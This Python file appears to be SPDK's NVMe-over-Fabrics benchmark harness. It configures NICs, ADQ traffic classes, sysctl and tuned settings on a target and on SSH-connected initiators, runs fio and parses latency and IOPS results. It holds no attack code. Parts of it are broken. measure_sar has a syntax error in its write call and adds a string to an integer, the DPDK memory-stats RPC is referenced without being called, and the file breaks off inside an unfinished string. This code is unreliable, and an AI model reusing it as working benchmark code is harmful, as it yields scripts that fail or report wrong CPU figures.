#!/usr/bin/env python3
from json.decoder import JSONDecodeError
import os
import re
import sys
import argparse
import json
import zipfile
import threading
import subprocess
import itertools
import configparser
import time
import uuid
from collections import OrderedDict
import paramiko
import pandas as pd
import rpc
import rpc.client
from common import *
class Server:
def __init__(self, name, general_config, server_config):
self.name = name
self.username = general_config["username"]
self.password = general_config["password"]
self.transport = general_config["transport"].lower()
self.nic_ips = server_config["nic_ips"]
self.mode = server_config["mode"]
self.irq_scripts_dir = "/usr/src/local/mlnx-tools/ofed_scripts"
if "irq_scripts_dir" in server_config and server_config["irq_scripts_dir"]:
self.irq_scripts_dir = server_config["irq_scripts_dir"]
self.local_nic_info = []
self._nics_json_obj = {}
self.svc_restore_dict = {}
self.sysctl_restore_dict = {}
self.tuned_restore_dict = {}
self.governor_restore = ""
self.tuned_profile = ""
self.enable_adq = False
self.adq_priority = None
if "adq_enable" in server_config and server_config["adq_enable"]:
self.enable_adq = server_config["adq_enable"]
self.adq_priority = 1
if "tuned_profile" in server_config:
self.tuned_profile = server_config["tuned_profile"]
if not re.match("^[A-Za-z0-9]*$", name):
self.log_print("Please use a name which contains only letters or numbers")
sys.exit(1)
def log_print(self, msg):
print("[%s] %s" % (self.name, msg), flush=True)
def get_uncommented_lines(self, lines):
return [line for line in lines if line and not line.startswith('#')]
def get_nic_name_by_ip(self, ip):
if not self._nics_json_obj:
nics_json_obj = self.exec_cmd(["ip", "-j", "address", "show"])
self._nics_json_obj = list(filter(lambda x: x["addr_info"], json.loads(nics_json_obj)))
for nic in self._nics_json_obj:
for addr in nic["addr_info"]:
if ip in addr["local"]:
return nic["ifname"]
def set_local_nic_info_helper(self):
pass
def set_local_nic_info(self, pci_info):
def extract_network_elements(json_obj):
nic_list = []
if isinstance(json_obj, list):
for x in json_obj:
nic_list.extend(extract_network_elements(x))
elif isinstance(json_obj, dict):
if "children" in json_obj:
nic_list.extend(extract_network_elements(json_obj["children"]))
if "class" in json_obj.keys() and "network" in json_obj["class"]:
nic_list.append(json_obj)
return nic_list
self.local_nic_info = extract_network_elements(pci_info)
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
return ""
def configure_system(self):
self.configure_services()
self.configure_sysctl()
self.configure_tuned()
self.configure_cpu_governor()
self.configure_irq_affinity()
def configure_adq(self):
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
self.adq_load_modules()
self.adq_configure_nic()
def adq_load_modules(self):
self.log_print("Modprobing ADQ-related Linux modules...")
adq_module_deps = ["sch_mqprio", "act_mirred", "cls_flower"]
for module in adq_module_deps:
try:
self.exec_cmd(["sudo", "modprobe", module])
self.log_print("%s loaded!" % module)
except CalledProcessError as e:
self.log_print("ERROR: failed to load module %s" % module)
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
def adq_configure_tc(self):
self.log_print("Configuring ADQ Traffic classess and filters...")
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
num_queues_tc0 = 2 # 2 is minimum number of queues for TC0
num_queues_tc1 = self.num_cores
port_param = "dst_port" if isinstance(self, Target) else "src_port"
ports = set([p[0] for p in self.subsystem_info_list])
xps_script_path = os.path.join(self.spdk_dir, "scripts", "perf", "nvmf", "set_xps_rxqs")
for nic_ip in self.nic_ips:
nic_name = self.get_nic_name_by_ip(nic_ip)
tc_qdisc_map_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name,
"root", "mqprio", "num_tc", "2", "map", "0", "1",
"queues", "%s@0" % num_queues_tc0,
"%s@%s" % (num_queues_tc1, num_queues_tc0),
"hw", "1", "mode", "channel"]
self.log_print(" ".join(tc_qdisc_map_cmd))
self.exec_cmd(tc_qdisc_map_cmd)
tc_qdisc_ingress_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name, "ingress"]
self.log_print(" ".join(tc_qdisc_ingress_cmd))
self.exec_cmd(tc_qdisc_ingress_cmd)
for port in ports:
tc_filter_cmd = ["sudo", "tc", "filter", "add", "dev", nic_name,
"protocol", "ip", "ingress", "prio", "1", "flower",
"dst_ip", "%s/32" % nic_ip, "ip_proto", "tcp", port_param, port,
"skip_sw", "hw_tc", "1"]
self.log_print(" ".join(tc_filter_cmd))
self.exec_cmd(tc_filter_cmd)
# Ethtool coalese settings must be applied after configuring traffic classes
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-rx", "off", "rx-usecs", "0"])
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-tx", "off", "tx-usecs", "500"])
self.log_print("Running set_xps_rxqs script for %s NIC..." % nic_name)
xps_cmd = ["sudo", xps_script_path, nic_name]
self.log_print(xps_cmd)
self.exec_cmd(xps_cmd)
def adq_configure_nic(self):
self.log_print("Configuring NIC port settings for ADQ testing...")
# Reload the driver first, to make sure any previous settings are re-set.
try:
self.exec_cmd(["sudo", "rmmod", "ice"])
self.exec_cmd(["sudo", "modprobe", "ice"])
except CalledProcessError as e:
self.log_print("ERROR: failed to reload ice module!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
self.log_print(nic)
try:
self.exec_cmd(["sudo", "ethtool", "-K", nic,
"hw-tc-offload", "on"]) # Enable hardware TC offload
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-inline-flow-director", "on"]) # Enable Intel Flow Director
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic, "fw-lldp-agent", "off"]) # Disable LLDP
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-pkt-inspect-optimize", "off"]) # Disable channel packet inspection optimization
except CalledProcessError as e:
self.log_print("ERROR: failed to configure NIC port using ethtool!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
self.log_print("Please update your NIC driver and firmware versions and try again.")
self.log_print(self.exec_cmd(["sudo", "ethtool", "-k", nic]))
self.log_print(self.exec_cmd(["sudo", "ethtool", "--show-priv-flags", nic]))
def configure_services(self):
self.log_print("Configuring active services...")
svc_config = configparser.ConfigParser(strict=False)
# Below list is valid only for RHEL / Fedora systems and might not
# contain valid names for other distributions.
svc_target_state = {
"firewalld": "inactive",
"irqbalance": "inactive",
"lldpad.service": "inactive",
"lldpad.socket": "inactive"
}
for service in svc_target_state:
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
svc_config.read_string(out)
if "LoadError" in svc_config[service] and "not found" in svc_config[service]["LoadError"]:
continue
service_state = svc_config[service]["ActiveState"]
self.log_print("Current state of %s service is %s" % (service, service_state))
self.svc_restore_dict.update({service: service_state})
if service_state != "inactive":
self.log_print("Disabling %s. It will be restored after the test has finished." % service)
self.exec_cmd(["sudo", "systemctl", "stop", service])
def configure_sysctl(self):
self.log_print("Tuning sysctl settings...")
busy_read = 0
if self.enable_adq and self.mode == "spdk":
busy_read = 1
sysctl_opts = {
"net.core.busy_poll": 0,
"net.core.busy_read": busy_read,
"net.core.somaxconn": 4096,
"net.core.netdev_max_backlog": 8192,
"net.ipv4.tcp_max_syn_backlog": 16384,
"net.core.rmem_max": 268435456,
"net.core.wmem_max": 268435456,
"net.ipv4.tcp_mem": "268435456 268435456 268435456",
"net.ipv4.tcp_rmem": "8192 1048576 33554432",
"net.ipv4.tcp_wmem": "8192 1048576 33554432",
"net.ipv4.route.flush": 1,
"vm.overcommit_memory": 1,
}
for opt, value in sysctl_opts.items():
self.sysctl_restore_dict.update({opt: self.exec_cmd(["sysctl", "-n", opt]).strip()})
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def configure_tuned(self):
if not self.tuned_profile:
self.log_print("WARNING: Tuned profile not set in configration file. Skipping configuration.")
return
self.log_print("Configuring tuned-adm profile to %s." % self.tuned_profile)
service = "tuned"
tuned_config = configparser.ConfigParser(strict=False)
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
tuned_config.read_string(out)
tuned_state = tuned_config[service]["ActiveState"]
self.svc_restore_dict.update({service: tuned_state})
if tuned_state != "inactive":
profile = self.exec_cmd(["cat", "/etc/tuned/active_profile"]).strip()
profile_mode = self.exec_cmd(["cat", "/etc/tuned/profile_mode"]).strip()
self.tuned_restore_dict = {
"profile": profile,
"mode": profile_mode
}
self.exec_cmd(["sudo", "systemctl", "start", service])
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_profile])
self.log_print("Tuned profile set to %s." % self.exec_cmd(["cat", "/etc/tuned/active_profile"]))
def configure_cpu_governor(self):
self.log_print("Setting CPU governor to performance...")
# This assumes that there is the same CPU scaling governor on each CPU
self.governor_restore = self.exec_cmd(["cat", "/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor"]).strip()
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "performance"])
def configure_irq_affinity(self):
self.log_print("Setting NIC irq affinity for NICs...")
irq_script_path = os.path.join(self.irq_scripts_dir, "set_irq_affinity.sh")
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
irq_cmd = ["sudo", irq_script_path, nic]
self.log_print(irq_cmd)
self.exec_cmd(irq_cmd, change_dir=self.irq_scripts_dir)
def restore_services(self):
self.log_print("Restoring services...")
for service, state in self.svc_restore_dict.items():
cmd = "stop" if state == "inactive" else "start"
self.exec_cmd(["sudo", "systemctl", cmd, service])
def restore_sysctl(self):
self.log_print("Restoring sysctl settings...")
for opt, value in self.sysctl_restore_dict.items():
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def restore_tuned(self):
self.log_print("Restoring tuned-adm settings...")
if not self.tuned_restore_dict:
return
if self.tuned_restore_dict["mode"] == "auto":
self.exec_cmd(["sudo", "tuned-adm", "auto_profile"])
self.log_print("Reverted tuned-adm to auto_profile.")
else:
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_restore_dict["profile"]])
self.log_print("Reverted tuned-adm to %s profile." % self.tuned_restore_dict["profile"])
def restore_governor(self):
self.log_print("Restoring CPU governor setting...")
if self.governor_restore:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", self.governor_restore])
self.log_print("Reverted CPU governor to %s." % self.governor_restore)
class Target(Server):
def __init__(self, name, general_config, target_config):
super(Target, self).__init__(name, general_config, target_config)
# Defaults
self.enable_sar = False
self.sar_delay = 0
self.sar_interval = 0
self.sar_count = 0
self.enable_pcm = False
self.pcm_dir = ""
self.pcm_delay = 0
self.pcm_interval = 0
self.pcm_count = 0
self.enable_bandwidth = 0
self.bandwidth_count = 0
self.enable_dpdk_memory = False
self.dpdk_wait_time = 0
self.enable_zcopy = False
self.scheduler_name = "static"
self.null_block = 0
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
self.subsystem_info_list = []
if "null_block_devices" in target_config:
self.null_block = target_config["null_block_devices"]
if "sar_settings" in target_config:
self.enable_sar, self.sar_delay, self.sar_interval, self.sar_count = target_config["sar_settings"]
if "pcm_settings" in target_config:
self.enable_pcm = True
self.pcm_dir, self.pcm_delay, self.pcm_interval, self.pcm_count = target_config["pcm_settings"]
if "enable_bandwidth" in target_config:
self.enable_bandwidth, self.bandwidth_count = target_config["enable_bandwidth"]
if "enable_dpdk_memory" in target_config:
self.enable_dpdk_memory, self.dpdk_wait_time = target_config["enable_dpdk_memory"]
if "scheduler_settings" in target_config:
self.scheduler_name = target_config["scheduler_settings"]
if "zcopy_settings" in target_config:
self.enable_zcopy = target_config["zcopy_settings"]
if "results_dir" in target_config:
self.results_dir = target_config["results_dir"]
self.script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
self.spdk_dir = os.path.abspath(os.path.join(self.script_dir, "../../../"))
self.set_local_nic_info(self.set_local_nic_info_helper())
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.zip_spdk_sources(self.spdk_dir, "/tmp/spdk.zip")
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
stderr_opt = None
if stderr_redirect:
stderr_opt = subprocess.STDOUT
if change_dir:
old_cwd = os.getcwd()
os.chdir(change_dir)
self.log_print("Changing directory to %s" % change_dir)
out = check_output(cmd, stderr=stderr_opt).decode(encoding="utf-8")
if change_dir:
os.chdir(old_cwd)
self.log_print("Changing directory to %s" % old_cwd)
return out
def zip_spdk_sources(self, spdk_dir, dest_file):
self.log_print("Zipping SPDK source directory")
fh = zipfile.ZipFile(dest_file, "w", zipfile.ZIP_DEFLATED)
for root, directories, files in os.walk(spdk_dir, followlinks=True):
for file in files:
fh.write(os.path.relpath(os.path.join(root, file)))
fh.close()
self.log_print("Done zipping")
def read_json_stats(self, file):
with open(file, "r") as json_data:
data = json.load(json_data)
job_pos = 0 # job_post = 0 because using aggregated results
# Check if latency is in nano or microseconds to choose correct dict key
def get_lat_unit(key_prefix, dict_section):
# key prefix - lat, clat or slat.
# dict section - portion of json containing latency bucket in question
# Return dict key to access the bucket and unit as string
for k, _ in dict_section.items():
if k.startswith(key_prefix):
return k, k.split("_")[1]
def get_clat_percentiles(clat_dict_leaf):
if "percentile" in clat_dict_leaf:
p99_lat = float(clat_dict_leaf["percentile"]["99.000000"])
p99_9_lat = float(clat_dict_leaf["percentile"]["99.900000"])
p99_99_lat = float(clat_dict_leaf["percentile"]["99.990000"])
p99_999_lat = float(clat_dict_leaf["percentile"]["99.999000"])
return [p99_lat, p99_9_lat, p99_99_lat, p99_999_lat]
else:
# Latest fio versions do not provide "percentile" results if no
# measurements were done, so just return zeroes
return [0, 0, 0, 0]
read_iops = float(data["jobs"][job_pos]["read"]["iops"])
read_bw = float(data["jobs"][job_pos]["read"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["read"])
read_avg_lat = float(data["jobs"][job_pos]["read"][lat_key]["mean"])
read_min_lat = float(data["jobs"][job_pos]["read"][lat_key]["min"])
read_max_lat = float(data["jobs"][job_pos]["read"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["read"])
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["read"][clat_key])
if "ns" in lat_unit:
read_avg_lat, read_min_lat, read_max_lat = [x / 1000 for x in [read_avg_lat, read_min_lat, read_max_lat]]
if "ns" in clat_unit:
read_p99_lat = read_p99_lat / 1000
read_p99_9_lat = read_p99_9_lat / 1000
read_p99_99_lat = read_p99_99_lat / 1000
read_p99_999_lat = read_p99_999_lat / 1000
write_iops = float(data["jobs"][job_pos]["write"]["iops"])
write_bw = float(data["jobs"][job_pos]["write"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["write"])
write_avg_lat = float(data["jobs"][job_pos]["write"][lat_key]["mean"])
write_min_lat = float(data["jobs"][job_pos]["write"][lat_key]["min"])
write_max_lat = float(data["jobs"][job_pos]["write"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["write"])
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["write"][clat_key])
if "ns" in lat_unit:
write_avg_lat, write_min_lat, write_max_lat = [x / 1000 for x in [write_avg_lat, write_min_lat, write_max_lat]]
if "ns" in clat_unit:
write_p99_lat = write_p99_lat / 1000
write_p99_9_lat = write_p99_9_lat / 1000
write_p99_99_lat = write_p99_99_lat / 1000
write_p99_999_lat = write_p99_999_lat / 1000
return [read_iops, read_bw, read_avg_lat, read_min_lat, read_max_lat,
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat,
write_iops, write_bw, write_avg_lat, write_min_lat, write_max_lat,
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat]
def parse_results(self, results_dir, csv_file):
files = os.listdir(results_dir)
fio_files = filter(lambda x: ".fio" in x, files)
json_files = [x for x in files if ".json" in x]
headers = ["read_iops", "read_bw", "read_avg_lat_us", "read_min_lat_us", "read_max_lat_us",
"read_p99_lat_us", "read_p99.9_lat_us", "read_p99.99_lat_us", "read_p99.999_lat_us",
"write_iops", "write_bw", "write_avg_lat_us", "write_min_lat_us", "write_max_lat_us",
"write_p99_lat_us", "write_p99.9_lat_us", "write_p99.99_lat_us", "write_p99.999_lat_us"]
aggr_headers = ["iops", "bw", "avg_lat_us", "min_lat_us", "max_lat_us",
"p99_lat_us", "p99.9_lat_us", "p99.99_lat_us", "p99.999_lat_us"]
header_line = ",".join(["Name", *headers])
aggr_header_line = ",".join(["Name", *aggr_headers])
# Create empty results file
with open(os.path.join(results_dir, csv_file), "w") as fh:
fh.write(aggr_header_line + "\n")
rows = set()
for fio_config in fio_files:
self.log_print("Getting FIO stats for %s" % fio_config)
job_name, _ = os.path.splitext(fio_config)
# Look in the filename for rwmixread value. Function arguments do
# not have that information.
# TODO: Improve this function by directly using workload params instead
# of regexing through filenames.
if "read" in job_name:
rw_mixread = 1
elif "write" in job_name:
rw_mixread = 0
else:
rw_mixread = float(re.search(r"m_(\d+)", job_name).group(1)) / 100
# If "_CPU" exists in name - ignore it
# Initiators for the same job could have diffrent num_cores parameter
job_name = re.sub(r"_\d+CPU", "", job_name)
job_result_files = [x for x in json_files if job_name in x]
self.log_print("Matching result files for current fio config:")
for j in job_result_files:
self.log_print("\t %s" % j)
# There may have been more than 1 initiator used in test, need to check that
# Result files are created so that string after last "_" separator is server name
inits_names = set([os.path.splitext(x)[0].split("_")[-1] for x in job_result_files])
inits_avg_results = []
for i in inits_names:
self.log_print("\tGetting stats for initiator %s" % i)
# There may have been more than 1 test run for this job, calculate average results for initiator
i_results = [x for x in job_result_files if i in x]
i_results_filename = re.sub(r"run_\d+_", "", i_results[0].replace("json", "csv"))
separate_stats = []
for r in i_results:
try:
stats = self.read_json_stats(os.path.join(results_dir, r))
separate_stats.append(stats)
self.log_print(stats)
except JSONDecodeError as e:
self.log_print("ERROR: Failed to parse %s results! Results might be incomplete!")
init_results = [sum(x) for x in zip(*separate_stats)]
init_results = [x / len(separate_stats) for x in init_results]
inits_avg_results.append(init_results)
self.log_print("\tAverage results for initiator %s" % i)
self.log_print(init_results)
with open(os.path.join(results_dir, i_results_filename), "w") as fh:
fh.write(header_line + "\n")
fh.write(",".join([job_name, *["{0:.3f}".format(x) for x in init_results]]) + "\n")
# Sum results of all initiators running this FIO job.
# Latency results are an average of latencies from accros all initiators.
inits_avg_results = [sum(x) for x in zip(*inits_avg_results)]
inits_avg_results = OrderedDict(zip(headers, inits_avg_results))
for key in inits_avg_results:
if "lat" in key:
inits_avg_results[key] /= len(inits_names)
# Aggregate separate read/write values into common labels
# Take rw_mixread into consideration for mixed read/write workloads.
aggregate_results = OrderedDict()
for h in aggr_headers:
read_stat, write_stat = [float(value) for key, value in inits_avg_results.items() if h in key]
if "lat" in h:
_ = rw_mixread * read_stat + (1 - rw_mixread) * write_stat
else:
_ = read_stat + write_stat
aggregate_results[h] = "{0:.3f}".format(_)
rows.add(",".join([job_name, *aggregate_results.values()]))
# Save results to file
for row in rows:
with open(os.path.join(results_dir, csv_file), "a") as fh:
fh.write(row + "\n")
self.log_print("You can find the test results in the file %s" % os.path.join(results_dir, csv_file))
def measure_sar(self, results_dir, sar_file_name):
self.log_print("Waiting %d delay before measuring SAR stats" % self.sar_delay)
cpu_number = os.cpu_count()
sar_idle_sum = 0
time.sleep(self.sar_delay)
out = self.exec_cmd(["sar", "-P", "ALL", "%s" % self.sar_interval, "%s" % self.sar_count])
with open(os.path.join(results_dir, sar_file_name), "w") as fh:
for line in out.split("\n"):
if "Average" in line:
if "CPU" in line:
self.log_print("Summary CPU utilization from SAR:")
self.log_print(line)
elif "all" in line:
self.log_print(line)
else:
sar_idle_sum += line.split()[7]
fh.write(out)
sar_cpu_usage = cpu_number * 100 - sar_idle_sum
with open(os.path.join(results_dir, sar_file_name), "a") as f:
f.write("Total CPU used: %s", % sar_cpu_usage)
def measure_pcm_memory(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm-memory.x" % self.pcm_dir, "%s" % self.pcm_interval, "-csv=%s/%s" % (results_dir, pcm_file_name)]
pcm_memory = subprocess.Popen(cmd)
time.sleep(self.pcm_count)
pcm_memory.terminate()
def measure_pcm(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count, "-csv=%s/%s" % (results_dir, pcm_file_name)]
subprocess.run(cmd)
df = pd.read_csv(os.path.join(results_dir, pcm_file_name), header=[0, 1])
df = df.rename(columns=lambda x: re.sub(r'Unnamed:[\w\s]*$', '', x))
skt = df.loc[:, df.columns.get_level_values(1).isin({'UPI0', 'UPI1', 'UPI2'})]
skt_pcm_file_name = "_".join(["skt", pcm_file_name])
skt.to_csv(os.path.join(results_dir, skt_pcm_file_name), index=False)
def measure_pcm_power(self, results_dir, pcm_power_file_name):
time.sleep(self.pcm_delay)
out = self.exec_cmd(["%s/pcm-power.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count])
with open(os.path.join(results_dir, pcm_power_file_name), "w") as fh:
fh.write(out)
def measure_network_bandwidth(self, results_dir, bandwidth_file_name):
self.log_print("INFO: starting network bandwidth measure")
self.exec_cmd(["bwm-ng", "-o", "csv", "-F", "%s/%s" % (results_dir, bandwidth_file_name),
"-a", "1", "-t", "1000", "-c", str(self.bandwidth_count)])
def measure_dpdk_memory(self, results_dir):
self.log_print("INFO: waiting to generate DPDK memory usage")
time.sleep(self.dpdk_wait_time)
self.log_print("INFO: generating DPDK memory usage")
rpc.env.env_dpdk_get_mem_stats
os.rename("/tmp/spdk_mem_dump.txt", "%s/spdk_mem_dump.txt" % (results_dir))
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(os.uname().release)
self.log_print("====Kernel command line:====")
with open('/proc/cmdline') as f:
cmdline = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(cmdline)))
self.log_print("====sysctl conf:====")
with open('/etc/sysctl.conf') as f:
sysctl = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(sysctl)))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
self.log_print("====zcopy settings:====")
self.log_print("zcopy enabled: %s" % (self.enable_zcopy))
self.log_print("====Scheduler settings:====")
self.log_print("SPDK scheduler: %s" % (self.scheduler_name))
class Initiator(Server):
def __init__(self, name, general_config, initiator_config):
super(Initiator, self).__init__(name, general_config, initiator_config)
# Required fields
self.ip = initiator_config["ip"]
self.target_nic_ips = initiator_config["target_nic_ips"]
# Defaults
self.cpus_allowed = None
self.cpus_allowed_policy = "shared"
self.spdk_dir = "/tmp/spdk"
self.fio_bin = "/usr/src/fio/fio"
self.nvmecli_bin = "nvme"
self.cpu_frequency = None
self.subsystem_info_list = []
if "spdk_dir" in initiator_config:
self.spdk_dir = initiator_config["spdk_dir"]
if "fio_bin" in initiator_config:
self.fio_bin = initiator_config["fio_bin"]
if "nvmecli_bin" in initiator_config:
self.nvmecli_bin = initiator_config["nvmecli_bin"]
if "cpus_allowed" in initiator_config:
self.cpus_allowed = initiator_config["cpus_allowed"]
if "cpus_allowed_policy" in initiator_config:
self.cpus_allowed_policy = initiator_config["cpus_allowed_policy"]
if "cpu_frequency" in initiator_config:
self.cpu_frequency = initiator_config["cpu_frequency"]
if os.getenv('SPDK_WORKSPACE'):
self.spdk_dir = os.getenv('SPDK_WORKSPACE')
self.ssh_connection = paramiko.SSHClient()
self.ssh_connection.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh_connection.connect(self.ip, username=self.username, password=self.password)
self.exec_cmd(["sudo", "rm", "-rf", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["mkdir", "-p", "%s" % self.spdk_dir])
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.copy_spdk("/tmp/spdk.zip")
self.set_local_nic_info(self.set_local_nic_info_helper())
self.set_cpu_frequency()
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def __del__(self):
self.ssh_connection.close()
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
if change_dir:
cmd = ["cd", change_dir, ";", *cmd]
# In case one of the command elements contains whitespace and is not
# already quoted, # (e.g. when calling sysctl) quote it again to prevent expansion
# when sending to remote system.
for i, c in enumerate(cmd):
if (" " in c or "\t" in c) and not (c.startswith("'") and c.endswith("'")):
cmd[i] = '"%s"' % c
cmd = " ".join(cmd)
# Redirect stderr to stdout thanks using get_pty option if needed
_, stdout, _ = self.ssh_connection.exec_command(cmd, get_pty=stderr_redirect)
out = stdout.read().decode(encoding="utf-8")
# Check the return code
rc = stdout.channel.recv_exit_status()
if rc:
raise CalledProcessError(int(rc), cmd, out)
return out
def put_file(self, local, remote_dest):
ftp = self.ssh_connection.open_sftp()
ftp.put(local, remote_dest)
ftp.close()
def get_file(self, remote, local_dest):
ftp = self.ssh_connection.open_sftp()
ftp.get(remote, local_dest)
ftp.close()
def copy_spdk(self, local_spdk_zip):
self.log_print("Copying SPDK sources to initiator %s" % self.name)
self.put_file(local_spdk_zip, "/tmp/spdk_drop.zip")
self.log_print("Copied sources zip from target")
self.exec_cmd(["unzip", "-qo", "/tmp/spdk_drop.zip", "-d", self.spdk_dir])
self.log_print("Sources unpacked")
def copy_result_files(self, dest_dir):
self.log_print("Copying results")
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
# Get list of result files from initiator and copy them back to target
file_list = self.exec_cmd(["ls", "%s/nvmf_perf" % self.spdk_dir]).strip().split("\n")
for file in file_list:
self.get_file(os.path.join(self.spdk_dir, "nvmf_perf", file),
os.path.join(dest_dir, file))
self.log_print("Done copying results")
def discover_subsystems(self, address_list, subsys_no):
num_nvmes = range(0, subsys_no)
nvme_discover_output = ""
for ip, subsys_no in itertools.product(address_list, num_nvmes):
self.log_print("Trying to discover: %s:%s" % (ip, 4420 + subsys_no))
nvme_discover_cmd = ["sudo",
"%s" % self.nvmecli_bin,
"discover", "-t", "%s" % self.transport,
"-s", "%s" % (4420 + subsys_no),
"-a", "%s" % ip]
try:
stdout = self.exec_cmd(nvme_discover_cmd)
if stdout:
nvme_discover_output = nvme_discover_output + stdout
except CalledProcessError:
# Do nothing. In case of discovering remote subsystems of kernel target
# we expect "nvme discover" to fail a bunch of times because we basically
# scan ports.
pass
subsystems = re.findall(r'trsvcid:\s(\d+)\s+' # get svcid number
r'subnqn:\s+([a-zA-Z0-9\.\-\:]+)\s+' # get NQN id
r'traddr:\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', # get IP address
nvme_discover_output) # from nvme discovery output
subsystems = filter(lambda x: x[-1] in address_list, subsystems)
subsystems = list(set(subsystems))
subsystems.sort(key=lambda x: x[1])
self.log_print("Found matching subsystems on target side:")
for s in subsystems:
self.log_print(s)
self.subsystem_info_list = subsystems
def gen_fio_filename_conf(self, *args, **kwargs):
# Logic implemented in SPDKInitiator and KernelInitiator classes
pass
def gen_fio_config(self, rw, rwmixread, block_size, io_depth, subsys_no, num_jobs=None, ramp_time=0, run_time=10, rate_iops=0):
fio_conf_template = """
[global]
ioengine={ioengine}
{spdk_conf}
thread=1
group_reporting=1
direct=1
percentile_list=50:90:99:99.5:99.9:99.99:99.999
norandommap=1
rw={rw}
rwmixread={rwmixread}
bs={block_size}
time_based=1
ramp_time={ramp_time}
runtime={run_time}
rate_iops={rate_iops}
"""
if "spdk" in self.mode:
bdev_conf = self.gen_spdk_bdev_conf(self.subsystem_info_list)
self.exec_cmd(["echo", "'%s'" % bdev_conf, ">", "%s/bdev.conf" % self.spdk_dir])
ioengine = "%s/build/fio/spdk_bdev" % self.spdk_dir
spdk_conf = "spdk_json_conf=%s/bdev.conf" % self.spdk_dir
else:
ioengine = self.ioengine
spdk_conf = ""
out = self.exec_cmd(["sudo", "nvme", "list", "|", "grep", "-E", "'SPDK|Linux'",
"|", "awk", "'{print $1}'"])
subsystems = [x for x in out.split("\n") if "nvme" in x]
if self.cpus_allowed is not None:
self.log_print("Limiting FIO workload execution on specific cores %s" % self.cpus_allowed)
cpus_num = 0
cpus = self.cpus_allowed.split(",")
for cpu in cpus:
if "-" in cpu:
a, b = cpu.split("-")
a = int(a)
b = int(b)
cpus_num += len(range(a, b))
else:
cpus_num += 1
self.num_cores = cpus_num
threads = range(0, self.num_cores)
elif hasattr(self, 'num_cores'):
self.log_print("Limiting FIO workload execution to %s cores" % self.num_cores)
threads = range(0, int(self.num_cores))
else:
self.num_cores = len(subsystems)
threads = range(0, len(subsystems))
if "spdk" in self.mode:
filename_section = self.gen_fio_filename_conf(self.subsystem_info_list, threads, io_depth, num_jobs)
else:
filename_section = self.gen_fio_filename_conf(threads, io_depth, num_jobs)
fio_config = fio_conf_template.format(ioengine=ioengine, spdk_conf=spdk_conf,
rw=rw, rwmixread=rwmixread, block_size=block_size,
ramp_time=ramp_time, run_time=run_time, rate_iops=rate_iops)
# TODO: hipri disabled for now, as it causes fio errors:
# io_u error on file /dev/nvme2n1: Operation not supported
# See comment in KernelInitiator class, kernel_init_connect() function
if hasattr(self, "ioengine") and "io_uring" in self.ioengine:
fio_config = fio_config + """
